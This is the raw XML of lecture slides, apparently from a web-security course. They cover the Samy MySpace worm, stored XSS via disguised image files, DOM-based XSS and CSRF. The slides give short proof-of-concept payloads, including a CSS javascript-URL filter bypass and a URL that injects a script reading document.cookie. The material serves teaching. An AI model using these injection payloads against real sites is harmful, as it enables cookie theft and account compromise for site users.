        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2205038"/>
            <a:ext cx="3211512" cy="6873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5619" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2759075" y="2060575"/>
            <a:ext cx="2301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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steal valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25620" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-713606">
            <a:off x="2438400" y="235902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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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752600" y="3457575"/>
            <a:ext cx="6726238" cy="1590675"/>
            <a:chOff x="1752600" y="3457525"/>
            <a:chExt cx="6726237" cy="1590725"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5943599" y="3457525"/>
              <a:ext cx="2535238" cy="4000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rgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Store bad stuff</a:t>
              </a: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1752600" y="4648187"/>
              <a:ext cx="2535238" cy="4000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rgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Download 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015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MySpace.com   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>(Samy worm)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6246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686800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users can post HTML on their pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>MySpace.com ensures HTML contains no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>…  but can do Javascript within CSS tags:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div style=“background:url(‘javascript:alert(1)’)”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Times"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>And can hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java\nscript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>With careful javascript hacking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy worm infects anyone who visits an infected MySpace page   …    and adds Samy as a friend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Samy had millions of friends within 24 hours.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5715000" y="6467475"/>
            <a:ext cx="31892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90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://namb.la/popular/tech.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252373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Stored XSS using images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rounded Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2667000"/>
            <a:ext cx="4724400" cy="1905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 smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652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762000" y="1676400"/>
            <a:ext cx="8229600" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"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400" smtClean="0"/>
              <a:t>Suppose   pic.jpg   on web server contains HTML !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> request for    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://site.com/pic.jpg    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>results in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			      &lt;html&gt;  fooled ya   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>IE will render this as HTML    (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Consider photo sharing sites that support image uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>What if attacker uploads an “image” that is a script?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="2" indent="-342900">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p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115487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DOM-based XSS (no server used)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675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Example page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;HTML&gt;&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hi &lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var pos = document.URL.indexOf("name=") + 5; document.write(document.URL.substring(pos,document.URL.length));</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Works fine with this URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=Joe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>But what about this one?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  http://www.example.com/welcome.html?name=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" smtClean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486400" y="6467475"/>
            <a:ext cx="33416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90000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amit Klein ... XSS of the Third Kind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970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895600" y="1976438"/>
            <a:ext cx="3276600" cy="3910012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895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF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5638800" y="1976438"/>
            <a:ext cx="533400" cy="2157412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300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13317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="170338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Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1600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Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6927850" y="4286250"/>
            <a:ext cx="21399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Network Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Intercepts and controls network communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13320" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="6267450"/>
            <a:ext cx="71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Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13321" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="4343400"/>
            <a:ext cx="6858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99FF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22" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="5257800"/>
            <a:ext cx="6858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99FF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23" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2362200"/>
            <a:ext cx="6858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3300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24" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276600"/>
            <a:ext cx="6858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3300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13325" name="Picture 11" descr="CompaqAlphaServerES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255838"/>
            <a:ext cx="11557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6" name="TextBox 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4954588" y="4743450"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13327" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4432300" y="2967038"/>
            <a:ext cx="488950" cy="30321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28" name="Straight Connector 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4242594" y="3899694"/>
            <a:ext cx="1028700" cy="100171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2" name="Cloud Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2778125"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -200975"/>
              <a:gd name="adj2" fmla="val 175085"/>
            </a:avLst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pic>
        <p:nvPicPr>
          <p:cNvPr id="13330" name="Picture 18" descr="toshiba_satellite_a105_s4284_lapto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4252913"/>
            <a:ext cx="143668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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="914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Network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Cross Site Request Forgery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picture</a:t>
            </a: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1CB60230-26B2-4122-A0D0-AB77677FE647}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 18" descr="toshiba_satellite_a105_s4284_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74963"/>
            <a:ext cx="1436688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11" descr="CompaqAlphaServerES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1538" y="1855788"/>
            <a:ext cx="11557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4" descr="DS15server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5173663"/>
            <a:ext cx="243681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9" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713413" y="4792663"/>
            <a:ext cx="16938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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90120" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5554663" y="1428750"/>
            <a:ext cx="176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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79881" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="6175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90122" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90123" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2763838" y="2070100"/>
            <a:ext cx="2068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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>establish session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79884" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
